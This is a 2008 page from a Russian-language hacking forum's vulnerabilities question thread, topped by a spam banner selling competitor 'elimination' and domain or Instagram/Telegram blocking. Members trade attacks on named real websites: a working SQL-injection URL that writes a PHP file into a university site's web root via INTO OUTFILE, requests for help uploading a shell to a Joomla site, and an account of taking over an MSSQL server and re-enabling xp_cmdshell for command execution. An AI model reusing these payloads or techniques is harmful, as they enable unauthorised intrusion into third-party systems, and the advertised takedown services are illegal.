УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 409 из 1393

409

Опции темы

Поиск в этой теме

Опции просмотра

#4081

09.12.2008, 20:10

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Чёт у меня не открывается твой сайт=((
Ты урл правильно указал???

#4082

09.12.2008, 20:14

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Цитата:

Сообщение от cric.cric

Доброе время суток!
Что можно с этим сделать есть скул иньекция на этом сайте !
Движок jomla версия помоему либо 1.1 либо 5.2.1
http://aing.kz/index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql]
Кто может помочь как залить шел или что-то плиз помогите!

А еше забыл еше отметить вход админ ку можно через http://aing.kz/administrator
Заранее спасибо!

http://whois.domaintools.com/aing.kz

Цитата:

Server Data
Domain Status: Registered And No Website

Error Message
Domain or IP Address Not Found

#4083

09.12.2008, 20:25

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от Tigger

А где ты нашел этот реальный путь? В каких конфигах?
Да и чего-то ничего не получается(( Всякие разные папки попробывал(( Ни выходить никак

Xspider-ом. Он если чо пишет, вряд ли ошибается. Вот по такой ссылке:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module =1'

реальный путь к серверу. А почему подтверждается, что он реальный - написано выше

#4084

09.12.2008, 21:52

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

Прошелся сканером по папкам, в принципе писать можно в http://kpi.ua/files/, но там почему-то пхп файлы не исполняются ( наверное, в хтакцесе что-то нехорошее прописали), но сканер выдал несколько интересных папок. Ближе к делу -

Код:

http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+0x3C3F70687020706870696E666F28293B203F3E+from+mysql.user+into+outfile+'/usr/hosting/www.ntu-kpi.kiev.ua/data/2/photo/xekinfo.php'--

http://kpi.ua/2/photo/xekinfo.php
Дальше сами...

#4085

09.12.2008, 22:29

masternet

Участник форума

Регистрация: 18.05.2008

Сообщений: 130

Провел на форуме:
1113633

Репутация: 155

подскажите дампер скуль..не сипт..

#4086

09.12.2008, 22:31

d1aVOL

Познающий

Регистрация: 29.07.2007

Сообщений: 49

Провел на форуме:
279583

Репутация: 7

такая ошибка что-нибудь полезное означает?

Цитата:

Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 3 in /home/guroob/public_html/bar-exclusive/index.php on line 12

например: http://www.bar-exclusive.ru/index.php?id=-1

ЗЫ: контрол + а, ибо черное на черном

#4087

09.12.2008, 22:51

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Раскрытие путей..

#4088

09.12.2008, 23:04

SHS

Познающий

Регистрация: 04.08.2008

Сообщений: 53

Провел на форуме:
63941

Репутация: 2

Назрел у меня вопрос.
В общем поимел я один MSSQL сервер. Добавил юзера в бд с правами sysadmin. Через клиента приконектился...
При выполнении запроса exec xp_cmdshell .... Вылезает ошибка следущего ввида:

-------------------
Сообщение 0, уровень 16, состояние 0, процедура xp_cmdshell, строка 1
Cannot load the DLL 123, or one of the DLLs it references. Reason: 126(error not found).
-------------------

Что бы это могло означать?
Как мне показалось ищет не ту ДЛЛ'ку и не там где надо. Как это исправить?

-------

Ситуация немного прояснилась.

Админ прописал несуществующую ДЛЛ "123".
Родная библиотека для xp_cmdshell : xplog70.dll
Я восстановил все как положено запросами вида:

exec sp_dropextendedproc 'xp_cmdshell';
exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

Но к сожалению не только было указанно неправильное название либы, но и нет её. По крайней мере там, где ищет SQL сервак.
Есть какие-либо варианты в данном случае? Или сушить вёсла?

З. Ы. Моя цель - выполнение команд.

Последний раз редактировалось SHS; 10.12.2008 в 00:07..

#4089

09.12.2008, 23:53

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

Подскажите метод проведения SQL-инъекций через POST.
К примеру, нашел я файл index.php с уязвимым параметром get. Как осуществить инъекцию?

#4090

10.12.2008, 00:04

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

мм.. обычно ..
посылаешь пакет изменённый и всё ))

Страница 409 из 1393

409

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход